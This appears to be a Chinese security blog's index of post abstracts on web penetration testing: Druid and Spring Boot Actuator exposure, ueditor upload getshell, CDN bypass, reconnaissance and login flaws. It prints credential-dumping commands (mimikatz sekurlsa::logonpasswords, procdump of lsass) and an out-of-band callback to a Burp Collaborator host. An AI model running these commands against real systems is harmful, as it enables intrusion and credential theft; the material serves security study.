摘要: Druid简介 1.Druid是阿里巴巴数据库事业部出品,为监控而生的数据库连接池. 2.Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控. Druid可能存在的一些问题 首先Druid是不存在什么漏洞的。 当开发者配置不当时就可能造成未授权访问下面给出常 阅读全文
posted @ 2020-03-12 22:20 cwkiller 阅读(23332) 评论(0) 推荐(1) 编辑
摘要: 主站打开是这样的只有扫码登陆 尝试扫码提示未注册 查看js,网站用了webpack打包 所有请求都在 这个js里面 尝试寻找敏感接口无果 百度site:domain.com 注意到wx1子域,打开这个链接跳转到在微信打开 那就到微信打开,查看功能点发现一处上传,先上传正常图片 改最下面的filena 阅读全文
posted @ 2020-02-25 21:09 cwkiller 阅读(3109) 评论(2) 推荐(1) 编辑
摘要: windows下通过start命令 会使用默认浏览器打开http://uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net/laptop k77ue954/hp 从burpsuite get请求的uri可以看到whoami内容. windows下通过 阅读全文
posted @ 2019-12-24 15:24 cwkiller 阅读(1423) 评论(0) 推荐(0) 编辑
摘要: ueditor版本.net 1.3.x,不是.net 1.4.3的getshell 上传页面是这样的需要开启flash,添加照片抓包。先正常上传 改后缀提示不允许的文件类型 注意到fileNameFormat参数为时间戳一样的东西,改为1看看效果 注意到文件名(不包含后缀)变为了1随之将,fileN 阅读全文
posted @ 2019-12-23 19:21 cwkiller 阅读(1650) 评论(0) 推荐(0) 编辑
摘要: 一.Spring Boot Actuators Spring Boot Actuator是Spring Boot提供的对应用系统的监控和管理的集成功能,可以查看应用配置的详细信息,例如自动化配置信息、创建的Spring beans信息、系统环境变量的配置信以及Web请求的详细信息等。如果使用不当或者 阅读全文
posted @ 2019-12-14 19:04 cwkiller 阅读(1557) 评论(1) 推荐(1) 编辑
摘要: 最近做项目遇到很多网站使用了cdn,导致扫目录等操作很难进行。 于是学习了一下绕过cdn的一下方法,记录一下。 大致分为下面几种方法: 1.查找子域名 实际上这个方法不一定有用因为很多子域名并不是和WWW是一个ip,但这也是渗透测试信息收集的必要部分所以讲一下。 搜集子域名的方法有很多种,SSL证书 阅读全文
posted @ 2019-11-20 20:14 cwkiller 阅读(2845) 评论(0) 推荐(0) 编辑
摘要: 1.查看公司名称天眼查查企业信息wiki百科查企业业务 1.1天眼查 1.2维基百科 这几个地方收集企业业务微信公共号app等资产 1.3app收集 华为应用商店 apple store 七麦数据 2.收集公司域名 SRC测试范围 企业备案查询 百度公司名称 乌云历史漏洞搜索 可搜公司名称,可搜公司 阅读全文
posted @ 2019-11-20 19:55 cwkiller 阅读(2030) 评论(0) 推荐(0) 编辑
摘要: 1.mimikatz mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >>1.txt exit 2.procdump 1、在目标机器上执行 procdump.exe -accepteula -ma lsass.exe 阅读全文
posted @ 2019-11-03 17:11 cwkiller 阅读(892) 评论(0) 推荐(0) 编辑
摘要: 扫目录发现 http://www.xxx.test.cn/bak/以及/bak/upload.jsp 上传抓包看返回包,没有回显路径 于是盲猜找上传文件夹,无果。回到bak目录发现可疑js 访问bak/login_js/login.js 找到一处后台地址 访问/bak/admin_manager1/ 阅读全文
posted @ 2019-11-03 16:56 cwkiller 阅读(900) 评论(0) 推荐(0) 编辑
摘要: 1.奇葩的任意用户注册 来到注册处点击发送验证码 等待重新发送的秒数结束,一定要等这个结束才能成功 我开始的时候成功一个结果复现不了 后来发现是这个原因,真想打开开发的脑袋看看 随便打验证码填密码,确定抓包 成功注册 2.http参数污染有关的任意用户登录 填好手机号,验证码,点获取动态密码抓包 增 阅读全文
posted @ 2019-10-18 10:14 cwkiller 阅读(1313) 评论(0) 推荐(0) 编辑